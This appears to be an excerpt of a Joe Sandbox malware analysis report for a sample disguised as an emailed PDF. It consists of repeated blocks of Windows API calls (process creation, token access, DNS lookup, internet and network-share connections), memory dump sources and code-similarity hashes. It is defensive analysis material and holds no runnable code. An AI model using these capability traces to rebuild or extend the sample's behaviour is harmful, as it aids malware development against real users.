• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007DFAC0), ref: 007B3ADF
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 34992053fc9bb9d1e8c51af990bfbf3db9f50bbcf8cd9f5dd82c2f23c399a25f
• Instruction ID: 4c4b4d60daf77e0937787e32e90ebd80d3a0edd22ca2b0a25d60f5976a2f6e5b
• Opcode Fuzzy Hash: 34992053fc9bb9d1e8c51af990bfbf3db9f50bbcf8cd9f5dd82c2f23c399a25f
• Instruction Fuzzy Hash: DC219474508201DF8300EF28D8859EB77F8BF55364F248A1AF49AC72A1D7399A89CB42
APIs
• _free.LIBCMT ref: 00785101
  • Part of subcall function 0077571C: __FF_MSGBANNER.LIBCMT ref: 00775733
  • Part of subcall function 0077571C: __NMSG_WRITE.LIBCMT ref: 0077573A
  • Part of subcall function 0077571C: RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: b7909ef9359d8c0e2cdd557c802912aa88d96238d0425203439d247e2876aeeb
• Instruction ID: e852cc39b4772ac44e7b1b3b16f200aa1f272e5735db6504f071a3b109860758
• Opcode Fuzzy Hash: b7909ef9359d8c0e2cdd557c802912aa88d96238d0425203439d247e2876aeeb
• Instruction Fuzzy Hash: D911A3B2D81A19EECF313F74EC4D75D3798AF043A1B20852AF909D6161DF3C89409791
APIs
• _memset.LIBCMT ref: 007544CF
  • Part of subcall function 0075407C: _memset.LIBCMT ref: 007540FC
  • Part of subcall function 0075407C: _wcscpy.LIBCMT ref: 00754150
  • Part of subcall function 0075407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00754160
• KillTimer.USER32(?,00000001,?,?), ref: 00754524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00754533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D4B9
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 16368f9f28662699065d64970db69471fc0b344eda723fb706c27aad63f651df
• Instruction ID: 0852f47fbe2e396f7d1aa36092195c61b4789702eae6025697738badfa5c5c47
• Opcode Fuzzy Hash: 16368f9f28662699065d64970db69471fc0b344eda723fb706c27aad63f651df
• Instruction Fuzzy Hash: 2221D770944784AFE7329B249855BE6BBECAF05319F04409EEA9E56181D3B82D88CB51
APIs
  • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
  • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
• gethostbyname.WSOCK32(?,?,?), ref: 007C6399
• WSAGetLastError.WSOCK32(00000000), ref: 007C63A4
• _memmove.LIBCMT ref: 007C63D1
• inet_ntoa.WSOCK32(?), ref: 007C63DC
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 78dd0c8cbc1e0f2d5d881c10aeeb883c66db0bb56e8fa8e0ddccf5c5d188f412
• Instruction ID: e5f6f70b1a4ba3241fad9fd321651eaeb18aa44eda1929cb1eda45e42e9d71ec
• Opcode Fuzzy Hash: 78dd0c8cbc1e0f2d5d881c10aeeb883c66db0bb56e8fa8e0ddccf5c5d188f412
• Instruction Fuzzy Hash: 4A116371500109EFCB04FBA4DD9ADEE77B8AF04311B148169F906A7161DF78AE18DB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 007A8B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8BA4
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
• Instruction ID: 25e06593a71acdf2df187b67bfa14835d8d3044e44ad882922d0f2762dffbf56
• Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
• Instruction Fuzzy Hash: 4B111CB9901218FFDB11DF95CC85F9DBB74FB49710F204195E900B7290DA716E11DBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                          • GetClientRect.USER32(?,?), ref: 0078B5FB
                                                                                                          • GetCursorPos.USER32(?), ref: 0078B605
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0078B610
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007AD84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007AD864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007AD879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007AD897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• GetWindowRect.USER32(?,?), ref: 007DB2E4
• ScreenToClient.USER32(?,?), ref: 007DB2FC
• ScreenToClient.USER32(?,?), ref: 007DB320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• _memset.LIBCMT ref: 007DB644
• _memset.LIBCMT ref: 007DB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00816F20,00816F64), ref: 007DB682
• CloseHandle.KERNEL32 ref: 007DB694
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007B6BE6
  • Part of subcall function 007B76C4: _memset.LIBCMT ref: 007B76F9
• _memmove.LIBCMT ref: 007B6C09
• _memset.LIBCMT ref: 007B6C16
• LeaveCriticalSection.KERNEL32(?), ref: 007B6C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
APIs
• GetSysColor.USER32(00000008), ref: 00752231
• SetTextColor.GDI32(?,000000FF), ref: 0075223B
• SetBkMode.GDI32(?,00000001), ref: 00752250
• GetStockObject.GDI32(00000005), ref: 00752258
• GetWindowDC.USER32(?,00000000), ref: 0078BE83
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0078BE90
• GetPixel.GDI32(00000000,?,00000000), ref: 0078BEA9
• GetPixel.GDI32(00000000,00000000,?), ref: 0078BEC2
• GetPixel.GDI32(00000000,?,?), ref: 0078BEE2
• ReleaseDC.USER32(?,00000000), ref: 0078BEED
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
APIs
• GetCurrentThread.KERNEL32 ref: 007A871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,007A82E6), ref: 007A8722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A82E6), ref: 007A872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,007A82E6), ref: 007A8736
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
Strings
Similarity
• API ID:
• String ID: %~
• API String ID: 0-3145668672
APIs
  • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
  • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
  • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
• __wcsnicmp.LIBCMT ref: 007BB02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB0F6
Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                          • String ID: LPT
                                                                                                          • API String ID: 3222508074-1350329615
                                                                                                          • Opcode ID: 50a731ef826c4e1901b3253c409f918c36020fdf4875b304369002f2f0da24c5
                                                                                                          • Instruction ID: 1c8a449cc8b9b24b05ec064b6009308a20e8b0ae362e06c9e89919b0986a0457
                                                                                                          • Opcode Fuzzy Hash: 50a731ef826c4e1901b3253c409f918c36020fdf4875b304369002f2f0da24c5
                                                                                                          • Instruction Fuzzy Hash: 9C616E75A00219EFCB14EF98C895FEEB7B5EB08310F144069FD16AB291D7B8AE44CB50
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00762968
                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00762981
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: 6e2186f846c5a538fbebff83c9a4056ce01f8b0b509fd3db8a63185b9b8d856e
                                                                                                          • Instruction ID: 7e61425047e0a60a2a0108827d4fc3b6c7510706f41b3ac74efaf47299b406cb
                                                                                                          • Opcode Fuzzy Hash: 6e2186f846c5a538fbebff83c9a4056ce01f8b0b509fd3db8a63185b9b8d856e
                                                                                                          • Instruction Fuzzy Hash: E9514572408744DBD320EF10D88ABABBBF8FB85351F41885DF6D8410A1DBB4952DCB66
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007C259E
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C25D4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_memset
                                                                                                          • String ID: |
                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                          • Opcode ID: 195fe590626b912eabc037364019d434f94bb93aca83fbf9d946f485351c2903
                                                                                                          • Instruction ID: 95522e1dc88b12e03234180a4ca29835a28bf06ff2ac2c1365242d0c17246c3d
                                                                                                          • Opcode Fuzzy Hash: 195fe590626b912eabc037364019d434f94bb93aca83fbf9d946f485351c2903
                                                                                                          • Instruction Fuzzy Hash: 0E313671C00119EBCF05AFA4DC89EEEBFB9FF08310F100059ED14B6162EA395A16DB60
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 007D7B61
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D7B76
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: e5a915725064b497b53658e122b63b78d145e1bbf9fb64ae5da49c8691df31c2
                                                                                                          • Instruction ID: bc9d43ef516e40bc1f9233b83b1590c4c87e0bf5f52c1dca7fc73ae9eea7440f
                                                                                                          • Opcode Fuzzy Hash: e5a915725064b497b53658e122b63b78d145e1bbf9fb64ae5da49c8691df31c2
                                                                                                          • Instruction Fuzzy Hash: 77411974A05209DFDB14CF68C881BEABBB9FF48304F14416AE904EB391E774A951CF90
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 007D6B17
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6B53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$DestroyMove
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                          • Opcode ID: 31252a0334b9a6bbe6cd3ff7bf59afa50986b67958644a2de8382a49f750096f
                                                                                                          • Instruction ID: 771a0358c01e9289ff8def234f348f898cc4bfa09862a4f4bc7aa903e6563888
                                                                                                          • Opcode Fuzzy Hash: 31252a0334b9a6bbe6cd3ff7bf59afa50986b67958644a2de8382a49f750096f
                                                                                                          • Instruction Fuzzy Hash: 9D316EB1200604AEDB109F64CC41AFB77B9FF88760F50851AF9A5D7290DB79AC51C760
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2911
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B294C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                          • Opcode ID: 272d2b00cb6ff87ae69057ef86778f99e23db4ec9828e1ba78dd3ba0512776bd
                                                                                                          • Instruction ID: 5894a230398f10c74805b4ff4aa6d2ebe420394be175f24ce4f6d755e79adacf
                                                                                                          • Opcode Fuzzy Hash: 272d2b00cb6ff87ae69057ef86778f99e23db4ec9828e1ba78dd3ba0512776bd
                                                                                                          • Instruction Fuzzy Hash: F031F531601305EBEF24DF58C845BEEBBB8EF45350F144029E989B61A2D778A942CB51
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D6761
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D676C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          • Opcode ID: 82685239bb8c960d3cfcc7ec9e72f442378069399180552b7db9701ef18d8c6d
                                                                                                          • Instruction ID: 536213c8c6be73b3ee880eeef5f982665d7142b14113fb054abedd7f11bd6941
                                                                                                          • Opcode Fuzzy Hash: 82685239bb8c960d3cfcc7ec9e72f442378069399180552b7db9701ef18d8c6d
                                                                                                          • Instruction Fuzzy Hash: 49116D75300208AFEF219F54DC85EAB377AEB883A8F11412AF95897391D679EC5187A0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007D6C71
                                                                                                          • GetSysColor.USER32(00000012), ref: 007D6C8B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                          • Opcode ID: f01b2cfa2bd735c879e3edacaef5891d326cb25e2f165927bdc0438281526b9a
                                                                                                          • Instruction ID: 9198c499609df335bab267c297e245e545e238c7b48af612c95c4cd08996e8a1
                                                                                                          • Opcode Fuzzy Hash: f01b2cfa2bd735c879e3edacaef5891d326cb25e2f165927bdc0438281526b9a
                                                                                                          • Instruction Fuzzy Hash: D1212C72620209AFDF04DFA8CC45AFA7BB8FB08315F004529FD56D2250D739E850DB60
                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 007D69A2
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D69B1
                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 42b60733733b9b77030a26f98ace343d9da88bdda4144879c16d36baae24c283
• Instruction ID: 4a2c8f5b87a4505ca048534f32c7d89018e7be7eb774b114dbe438714ac4eaa8
• Opcode Fuzzy Hash: 42b60733733b9b77030a26f98ace343d9da88bdda4144879c16d36baae24c283
• Instruction Fuzzy Hash: 91118C71100208ABEB108E74DC65AEB37B9EB053B4F50872AF9A5972E0C779EC509B60
APIs
• _memset.LIBCMT ref: 007B2A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2A41
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: b3644393d2a432e01e3b40765a24114430af58ae6fea7eac660e89d223054c52
• Instruction ID: 40390da1b0d52f051a1cbb050505a4666b2a183e3c980502f171ee7ac579eb9a
• Opcode Fuzzy Hash: b3644393d2a432e01e3b40765a24114430af58ae6fea7eac660e89d223054c52
• Instruction Fuzzy Hash: 1911D332902114EBCB30EB98DC44BDA73B8AB85300F04C021EC55E7292D738AD0BC791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2255
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 3dde361041039c85eca08806b6a7a1fe87e90d9fa2f426a96398248dbf6d475d
• Instruction ID: 18e97e29bc45440c908bc8dbba913f78cca310ac667549b210d51da2ec60ce12
• Opcode Fuzzy Hash: 3dde361041039c85eca08806b6a7a1fe87e90d9fa2f426a96398248dbf6d475d
• Instruction Fuzzy Hash: CD110270601225BADB248F118C84FFBFBACFF06361F10822EFA1586001D2785982D6F0
APIs
